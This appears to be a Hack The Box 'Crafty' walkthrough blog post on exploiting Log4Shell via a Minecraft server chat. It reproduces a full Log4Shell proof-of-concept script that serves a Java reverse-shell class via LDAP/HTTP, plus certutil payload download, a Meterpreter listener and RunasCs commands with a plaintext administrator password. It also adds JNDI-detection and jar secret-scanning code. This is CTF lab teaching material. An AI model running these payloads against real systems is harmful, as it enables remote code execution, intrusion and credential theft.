HTB CRAFTY WRITEUP

Muhammad Raheem
8 min readMar 14, 2024


Crafty is an easy machine from the HTB community.

It's a Windows-based box, and we have to root it.

Let's start with the Nmap scan.

Nmap scan report for crafty.htb (10.10.11.249)
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
| vulners:
| Minecraft 1.16.5:
| PRION:CVE-2023-33245 6.8 https://vulners.com/prion/PRION:CVE-2023-33245
|_ CVE-2023-33245 6.8 https://vulners.com/cve/CVE-2023-33245
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap fingerprints a Minecraft 1.16.5 server on port 25565 (the IIS site on port 80 is the only other open port). The vulners script flags CVE-2023-33245 for that version, but the finding that matters here is that Minecraft 1.16.5 ships a Log4j 2 version vulnerable to Log4Shell (CVE-2021-44228), and the server logs chat messages through it.

The Nikto scan reports several XSS "vulnerabilities", but these are signature matches for PHP Image View, PostNuke and Web Wiz Forums, none of which plausibly runs on this IIS host; the scan was run against the IP and the root page redirects to http://crafty.htb, so most probed paths likely got the same response and tripped Nikto's checks. Treat them as false positives unless confirmed by hand. The only genuine findings are the missing X-Frame-Options and X-Content-Type-Options headers.

<==== NIKTO SCAN ====>
Performing Nikto scan...
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.11.249
+ Target Hostname: 10.10.11.249
+ Target Port: 80
+ Start Time: 2024-03-13 06:32:52 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://crafty.htb
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1724
+ /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).
+ /members.asp?SF=%22;}alert(223344);function%20x()\{v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). See: OSVDB-4598
+ /forum_members.asp?find=%22;}alert(9823);function%20x()\{v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). See: OSVDB-2946
+ 8075 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2024-03-13 07:11:27 (GMT-4) (2315 seconds)

So the exploit path is Log4Shell against the Minecraft server.

Following the PoC now:

  1. Install TLauncher to run a Minecraft client.
  2. Select the Minecraft version to match the server, in our case 1.16.5.
  3. Connect to crafty.htb:25565; the Minecraft server accepts the connection.

https://github.com/kozmer/log4j-shell-poc

This is the PoC from that repo that we use to exploit the Minecraft server through the Log4j vulnerability:

#!/usr/bin/env python3
# kozmer/log4j-shell-poc for CVE-2021-44228. It compiles a Java reverse-shell
# class, serves it over HTTP, and runs an LDAP referral server so that the
# victim's JNDI lookup (${jndi:ldap://attacker:1389/a}) ends up loading it.

import argparse
import os
import subprocess
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
from pathlib import Path

from colorama import Fore, init

CUR_FOLDER = Path(__file__).parent.resolve()
# The PoC expects an old JDK 8 unpacked next to it: its javac produces class
# files the target JVM accepts, and its java runs the bundled marshalsec jar.
JDK_BIN = os.path.join(CUR_FOLDER, "jdk1.8.0_20", "bin")
MARSHALSEC_JAR = os.path.join(CUR_FOLDER, "target", "marshalsec-0.0.3-SNAPSHOT-all.jar")


def generate_payload(userip: str, lport: int) -> None:
    """Write Exploit.java (a TCP reverse shell back to userip:lport) and
    compile it to Exploit.class in the current directory."""
    # Everything the victim runs happens in the constructor, because JNDI
    # instantiates the class it loads. On a Windows target "/bin/bash"
    # becomes "cmd.exe".
    program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {

    public Exploit() throws Exception {
        String host = "%s";
        int port = %d;
        String cmd = "/bin/bash";
        Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s = new Socket(host, port);
        InputStream pi = p.getInputStream(),
                    pe = p.getErrorStream(),
                    si = s.getInputStream();
        OutputStream po = p.getOutputStream(), so = s.getOutputStream();
        // Pump bytes between the shell and the socket until either side ends.
        while (!s.isClosed()) {
            while (pi.available() > 0)
                so.write(pi.read());
            while (pe.available() > 0)
                so.write(pe.read());
            while (si.available() > 0)
                po.write(si.read());
            so.flush();
            po.flush();
            Thread.sleep(50);
            try {
                p.exitValue();
                break;
            } catch (Exception e) {
            }
        }
        p.destroy();
        s.close();
    }
}
""" % (userip, lport)

    # writing the exploit to Exploit.java file and compiling it
    p = Path("Exploit.java")
    try:
        p.write_text(program)
        subprocess.run([os.path.join(JDK_BIN, "javac"), str(p)], check=True)
    except (OSError, subprocess.CalledProcessError) as e:
        print(Fore.RED + f"[-] Something went wrong {e}")
        raise
    else:
        print(Fore.GREEN + "[+] Exploit java class created success")


def payload(userip: str, webport: int, lport: int) -> None:
    generate_payload(userip, lport)

    print(Fore.GREEN + "[+] Setting up LDAP server\n")

    # the LDAP referral server runs on its own thread ...
    t1 = threading.Thread(target=ldap_server, args=(userip, webport))
    t1.start()

    # ... and the web server hands out Exploit.class from the current directory
    print(f"[+] Starting Webserver on port {webport} http://0.0.0.0:{webport}")
    httpd = HTTPServer(("0.0.0.0", webport), SimpleHTTPRequestHandler)
    httpd.serve_forever()


def check_java() -> bool:
    """True if the bundled JDK's java binary runs."""
    exit_code = subprocess.call(
        [os.path.join(JDK_BIN, "java"), "-version"],
        stderr=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
    )
    return exit_code == 0


def ldap_server(userip: str, webport: int) -> None:
    """Run marshalsec's LDAPRefServer on port 1389. It answers the victim's
    lookup with a reference whose codebase is our web server and whose
    factory class is Exploit, so a vulnerable JVM fetches Exploit.class
    from http://userip:webport/ and instantiates it."""
    sendme = "${jndi:ldap://%s:1389/a}" % (userip)
    print(Fore.GREEN + f"[+] Send me: {sendme}\n")

    url = "http://{}:{}/#Exploit".format(userip, webport)
    subprocess.run([
        os.path.join(JDK_BIN, "java"),
        "-cp",
        MARSHALSEC_JAR,
        "marshalsec.jndi.LDAPRefServer",
        url,
    ])


def main() -> None:
    init(autoreset=True)
    print(Fore.BLUE + """
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
""")

    parser = argparse.ArgumentParser(description="log4shell PoC")
    parser.add_argument("--userip",
                        metavar="userip",
                        type=str,
                        default="localhost",
                        help="Enter IP for LDAPRefServer & Shell")
    parser.add_argument("--webport",
                        metavar="webport",
                        type=int,
                        default=8000,
                        help="listener port for HTTP port")
    parser.add_argument("--lport",
                        metavar="lport",
                        type=int,
                        default=9001,
                        help="Netcat Port (start the listener yourself)")

    args = parser.parse_args()

    try:
        if not check_java():
            print(Fore.RED + "[-] Java is not installed inside the repository")
            raise SystemExit(1)
        payload(args.userip, args.webport, args.lport)
    except KeyboardInterrupt:
        print(Fore.RED + "user interrupted the program.")
        raise SystemExit(0)


if __name__ == "__main__":
    main()
  1. Importing libraries: the script imports argparse, colorama, subprocess, threading, pathlib.Path, os and http.server.
  2. Defining constants: CUR_FOLDER is the directory the script lives in; the bundled JDK and the marshalsec jar are located relative to it.
  3. Generating the payload: generate_payload writes a Java class (Exploit.java) whose constructor spawns a shell and connects it back to the attacker's IP and port, then compiles it with the bundled JDK's javac. Everything the victim executes happens in that constructor, because JNDI instantiates the class it loads.
  4. Setting up the payload: payload runs generate_payload, starts the LDAP server on a separate thread via ldap_server, and then serves the current directory (which now contains Exploit.class) over HTTP on webport.
  5. Checking the Java installation: check_java runs the bundled java -version and checks the exit code.
  6. Starting the LDAP server: ldap_server prints the string to inject (${jndi:ldap://<userip>:1389/a}) and launches marshalsec's LDAPRefServer, which answers the victim's LDAP query with a reference to http://<userip>:<webport>/#Exploit; a vulnerable JVM follows it, downloads Exploit.class and instantiates it.
  7. Main function: main parses the command-line arguments (user IP, web port and listener port), checks the Java installation and starts the payload generation and server setup. It never starts the listener on lport; that is left to us (for example with netcat).
  8. Execution: the script calls main when it is run directly.

POV from Software Sinner

So let's explore a bit more what the exploit does and what it relies on.

What is the Log4j exploit?

Log4j didn’t get much attention until December 2021, when a series of critical vulnerabilities were publicly disclosed.

The Log4j exploit began as a single vulnerability, but it became a series of issues involving Log4j and the Java Naming and Directory Interface (JNDI), which is the root cause of the exploit.

What is JNDI ?

JNDI stands for Java Naming and Directory Interface. It is a Java API that provides a unified interface to multiple naming and directory services, such as DNS, LDAP, NIS, and RMI. JNDI allows Java applications to access and manipulate objects in these naming and directory services in a uniform manner, regardless of the underlying service’s implementation.

OK, now we have a good grip on how the exploit works.
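The defensive side of the same mechanism: the payload works because Log4j resolves ${...} lookups inside a logged message, and attackers hide the literal "jndi" behind nested lookups such as ${lower:j}, ${::-j} or ${env:NOPE:-j}. The detector below (an added example for this writeup, not code from the PoC or the box) collapses those nested lookups the way Log4j's string substitutor would and then looks for the JNDI lookup, running over a few constructed Minecraft server log lines; the player names, the 10.10.14.5 address and the payloads are made up for the example.

```python
from __future__ import annotations

import re

# Innermost ${...} lookup: a body with no nested "${", "{" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup with scheme, host and optional port (re.I: "jNdI" still matches).
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/:}\s]+)(?::(\d+))?", re.I)
# Minecraft server log chat format: "[HH:MM:SS] [Server thread/INFO]: <player> message"
CHAT = re.compile(r"^\[[^\]]+\] \[[^\]]+\]: <([^>]+)> (.*)$")


def evaluate_lookup(body: str) -> str | None:
    """Resolve one innermost lookup the way Log4j's StrSubstitutor does for
    the lookups attackers use to hide 'jndi'. None = not resolvable offline."""
    if ":-" in body:                 # ${name:-default} -> default (covers ${::-j}, ${env:NOPE:-j})
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix.strip().lower() == "lower":
        return value.lower()
    if sep and prefix.strip().lower() == "upper":
        return value.upper()
    return None                      # e.g. ${jndi:...}, ${date:...}, ${10}


def normalize(message: str, max_passes: int = 32) -> str:
    """Repeatedly collapse innermost lookups until nothing more resolves."""
    for _ in range(max_passes):
        changed = False

        def sub(m: re.Match) -> str:
            nonlocal changed
            resolved = evaluate_lookup(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        message = INNERMOST.sub(sub, message)
        if not changed:
            break
    return message


def detect_jndi(message: str) -> tuple[str, str, int | None] | None:
    """(scheme, host, port) of the JNDI lookup hidden in message, or None."""
    m = JNDI.search(normalize(message))
    if not m:
        return None
    return m.group(1).lower(), m.group(2), int(m.group(3)) if m.group(3) else None


def scan_log(log: str) -> list[tuple[str, str, str, int | None]]:
    """Run the detector over every chat line of a Minecraft server log."""
    hits = []
    for line in log.splitlines():
        chat = CHAT.match(line)
        if not chat:
            continue
        found = detect_jndi(chat.group(2))
        if found:
            hits.append((chat.group(1),) + found)
    return hits


# Constructed sample log: players, attacker IP and payloads are made up.
SAMPLE_LOG = """\
[13:37:01] [Server thread/INFO]: Steve joined the game
[13:37:05] [Server thread/INFO]: <Steve> hello everyone
[13:37:09] [Server thread/INFO]: <Alex> ${jndi:ldap://10.10.14.5:1389/a}
[13:37:12] [Server thread/INFO]: <Alex> ${${lower:j}${upper:n}di:${::-l}dap://10.10.14.5:1389/Exploit}
[13:37:15] [Server thread/INFO]: <Alex> ${${env:NOPE:-j}ndi:rmi://10.10.14.5:1099/Exploit}
[13:37:20] [Server thread/INFO]: <Steve> price is ${10} diamonds
"""

if __name__ == "__main__":
    for player, scheme, host, port in scan_log(SAMPLE_LOG):
        print(f"{player} sent a JNDI lookup to {scheme}://{host}:{port}")
```

Only lower, upper and the default-value syntax are resolved because those are the lookups that need no outside state; anything else (date, sys, env without a default) is left in place, and the JNDI pattern is still matched on the ${jndi: prefix alone, so an unresolved inner lookup cannot hide it.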

Moving towards exploitation

EXPLOITATION

Change the exploit a bit to make it work against a Windows target: the PoC's Exploit class has cmd="/bin/bash", so replace it with cmd="cmd.exe".

Download the JDK build the PoC expects (jdk-8u20-linux-x64) and extract it into the same folder as poc.py, so that jdk1.8.0_20/bin/javac and java exist there (check_java fails otherwise).

sudo python3 poc.py --userip <your attack ip here> --webport 80 --lport 4444

(sudo is needed because the web server binds port 80.) Start a listener on the lport first (the PoC calls it the netcat port but does not start one itself), then copy the "Send me" string, press T in Minecraft to open the chat box, paste the payload and hit Enter. The server logs the chat message through Log4j, which resolves the JNDI lookup against our LDAP server, downloads Exploit.class from our web server and runs it, and we get the reverse shell.

We get user.txt from here and move on to privesc.

I checked all the privesc vectors but found nothing interesting, and I wasn't able to download any file from this shell, so I upgraded it to Meterpreter and am now working from Meterpreter.

certutil -urlcache -f http://your_attack_ip:9009/shell-x64.exe shell-x64.exe

for payload delivery, and for the listener:

msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter_reverse_tcp; set lhost your_attack_ip; set lport 7988; exploit"

and we got our shell.

We found a plugins directory in the server.

In plugins there is a .jar file; it seems to be a snapshot that may help us.

Download it and then analyze it.

Now let's analyze it with jadx-gui, a Java decompiler.

Now we have a password, a localhost address and a port.

Looking at the Rcon class we got this.

I interpreted it as the Administrator password and tried to find a way to go further with it.
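The same hunt done headlessly, as an added example for this writeup (not the author's tooling): the script walks every .class inside a jar, parses the JVM constant pool and pulls out only the string literals (the CONSTANT_String entries, so class and method names do not pollute the list), then flags anything that looks like a host, a port or a password. It builds a constructed mini plugin jar with a Rcon class for demonstration; the class names, "localhost", "25575" and "Example1Pass" are made up and are not the values found on the box.

```python
from __future__ import annotations

import io
import re
import struct
import zipfile

MAGIC = b"\xca\xfe\xba\xbe"
# Payload size of the fixed-width constant-pool tags (JVMS 4.4); tag 1 (Utf8)
# is variable-length and tag 8 (String) is handled separately below.
FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 9: 4, 10: 4, 11: 4,
              12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def class_string_literals(data: bytes) -> list[str]:
    """String literals (CONSTANT_String entries) of one class file, in pool order."""
    if data[:4] != MAGIC:
        raise ValueError("not a class file")
    (count,) = struct.unpack(">H", data[8:10])
    pos, idx = 10, 1
    utf8: dict[int, str] = {}
    string_refs: list[int] = []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:                                  # CONSTANT_Utf8
            (n,) = struct.unpack(">H", data[pos:pos + 2])
            utf8[idx] = data[pos + 2:pos + 2 + n].decode("utf-8", "replace")
            pos += 2 + n
        elif tag == 8:                                # CONSTANT_String -> Utf8 index
            (ref,) = struct.unpack(">H", data[pos:pos + 2])
            string_refs.append(ref)
            pos += 2
        elif tag in FIXED_SIZE:
            pos += FIXED_SIZE[tag]
            if tag in (5, 6):                         # long/double occupy two slots
                idx += 1
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {pos - 1}")
        idx += 1
    return [utf8[r] for r in string_refs]


def jar_string_literals(jar_bytes: bytes) -> dict[str, list[str]]:
    """class name -> literals, for every .class entry in the jar."""
    out: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith(".class"):
                out[name[:-6].replace("/", ".")] = class_string_literals(zf.read(name))
    return out


HOST_RE = re.compile(r"^(localhost|\d{1,3}(?:\.\d{1,3}){3})$")
PASSWORD_RE = re.compile(r"^(?=.*[A-Za-z])(?=.*\d)[A-Za-z0-9!@#$%^&*_\-]{8,64}$")


def classify(literal: str) -> str | None:
    """Cheap heuristics: a host, a port, or a password-looking token
    (letters and digits, 8-64 chars, no whitespace)."""
    if HOST_RE.match(literal):
        return "host"
    if literal.isdigit() and 1 <= int(literal) <= 65535:
        return "port"
    if PASSWORD_RE.match(literal):
        return "password-like"
    return None


def find_candidate_secrets(literals: dict[str, list[str]]) -> list[tuple[str, str, str]]:
    return [(cls, lit, kind)
            for cls, lits in literals.items()
            for lit in lits
            if (kind := classify(lit)) is not None]


def build_sample_class(class_name: str, literals: list[str]) -> bytes:
    """Constructed minimal class file (no fields/methods) carrying the given
    literals plus one long constant, so the two-slot rule is exercised."""
    pool = []

    def add(tag: int, payload: bytes) -> int:
        pool.append((tag, payload))
        return len(pool)                              # 1-based pool index

    def utf8(s: str) -> int:
        raw = s.encode("utf-8")
        return add(1, struct.pack(">H", len(raw)) + raw)

    this_class = add(7, struct.pack(">H", utf8(class_name)))
    super_class = add(7, struct.pack(">H", utf8("java/lang/Object")))
    for s in literals:
        add(8, struct.pack(">H", utf8(s)))
    add(5, struct.pack(">q", 1234567890123))          # CONSTANT_Long ...
    pool.append(None)                                 # ... and its phantom second slot
    body = b"".join(bytes([t]) + p for t, p in (e for e in pool if e is not None))
    header = MAGIC + struct.pack(">HHH", 0, 52, len(pool) + 1)  # minor, major (Java 8), cp count
    tail = struct.pack(">HHHHHHH", 0x0021, this_class, super_class, 0, 0, 0, 0)
    return header + body + tail


def build_sample_jar() -> bytes:
    """Constructed stand-in for the plugin jar found in the plugins directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("Rcon.class", build_sample_class(
            "Rcon", ["localhost", "25575", "Example1Pass", "rcon.password"]))
        zf.writestr("Main.class", build_sample_class("Main", ["Plugin enabled"]))
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    jar = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_jar()
    for cls, lit, kind in find_candidate_secrets(jar_string_literals(jar)):
        print(f"{cls}: {kind}: {lit!r}")
```

Run it with the path of the downloaded plugin jar as the only argument; with no argument it scans the constructed sample. The heuristics are deliberately loose, so treat the output as a list of things to look at in jadx-gui rather than as confirmed credentials.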

Then I came across a tool named RunasCs.exe that can be used to run a command as any user we have credentials for.

Using Meterpreter I uploaded RunasCs.exe first.

Then I uploaded a Meterpreter shell.exe.

RunasCs.exe Administrator s67u84zKq8IXw "shell.exe"

I tried to run it using RunasCs.exe but was not getting a reverse shell. After some time I got the shell, but with a timeout error, so I tried to read the flag using RunasCs.exe directly.

First I listed the directory using RunasCs.exe:

RunasCs.exe Administrator s67u84zKq8IXw "cmd /c dir C:\Users\Administrator\Desktop"

Then read the flag:

RunasCs.exe Administrator s67u84zKq8IXw "cmd /c type C:\Users\Administrator\Desktop\root.txt"

And so we rooted this box in this way.

It took me 24 hours to root this box, as the connections to the VM and the server were unstable; I reset the machine multiple times and went through a lot of shells and Meterpreter sessions. So maybe it's an issue on my side, or maybe it's an issue with the box that it requires reconnecting so many times.

It was my first time playing Minecraft, so I enjoyed the frustration of rooting this box along with the cozy sound of Minecraft in the background.

Happy Hacking :)
